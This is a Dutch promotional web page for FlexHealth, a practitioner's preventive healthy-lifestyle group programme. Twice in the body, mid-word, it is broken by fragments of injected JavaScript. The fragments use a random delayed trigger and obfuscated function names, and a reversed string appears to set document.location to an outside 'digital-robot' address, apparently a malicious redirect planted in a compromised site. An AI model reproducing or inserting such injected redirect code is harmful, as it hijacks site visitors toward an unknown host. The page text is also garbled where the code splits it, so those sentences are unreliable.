/FlexHealth
FlexHealth 2019-06-03T08:32:51+01:00

https://www.flexhealth.eu

Naast mijn praktijk Centrum Engelbrecht, heb ik FlexHealth opgericht voor iedereen die controle wil hebben over zijn/haar gezondheid en fit oud wil worden.

De naam FlexHealth

Gezondheid is flexibiliteit. Het menselijk lichaam hoort flexibel om te kunnen gaan met veranderingen die het leven met zich mee brengt. Wanneer je dit vermogen weet te behouden of te herstellen, dan houd je chronische klachten buiten de deur. Terwijl ik in mijn praktijk patiënten individueel behandel, begeleid ik met FlexHealth mensen die preventief aan de slag willen met een gezonde leefstijl. Dit gebeurt in groepjes van 6 à 8 personen. 

Programma’s gezonde leefstijl

Via FlexHealth geef ik diverse programma’s gezonde leefstijl, waarbij je inzicht en dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tools krijgt om je leven gezonder te leven. Want wie wil niet fit een mooie leeftijd bereiken:

  • vol energie
  • met bewegingsvrijheid
  • met optimale vitale organen
  • daarbij alert blijven
  • met een goed geheugen
  • zich erbij ontspannen voelen en genieten
  • zonder medicijnen en hun bijwerkingen of met een minimum aan medicijnen
  • en goed kunnen blijven werken en sporten

Met andere woorden: kunnen blijven ondernemen? 

Lang is er zeer weinig ruimte geweest voor preventieve geneeskunde, ook wel leefstijlgeneeskunde genoemd. Tijden veranderen en de wetenschappelijke kennis eromheen wordt steeds uitgebreider, het is al zover dat preventieve zorg realiteit is. Deze verandering is niet alleen essentieel tegen de enorm oplopende kosten van onze gezondheidszorg maar ook in ons eigen belang.  Het kan nog even duren voordat het in de bestaande gezondheidszorg geïmplementeerd is. Ter onderbouwing verwijs ik je graag naar het stukje uit het NRC van 3 april 2018, waarin een pleidooi wordt gehouden voor het herkennen van ‘leefstijlgeneeskunde’ als medisch specialisme.

Waarom ik gezonde leefstijl promodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tor ben geworden

Ik geloof in de kracht van preventie: voorkomen is nog steeds beter dan genezen. In mijn praktijk stimuleer ik tijdens mijn behandelingen altijd al eigen inzet door het geven van onderbouwde adviezen. Mijn cliënten krijgen hiermee zelf inzicht in hoe hun lichaam en geest functioneren en wat er voor nodig is om die samenwerking weer optimaal te krijgen en te behouden. De resultaten zijn zo bemoedigend, dat ik de wetenschappelijke kennis van de werkingsmechanismes in het lichaam en brein grootschaliger wil delen en preventief wil inzetten.

 

Bekijk alle programma’s voor een gezonde leefstijl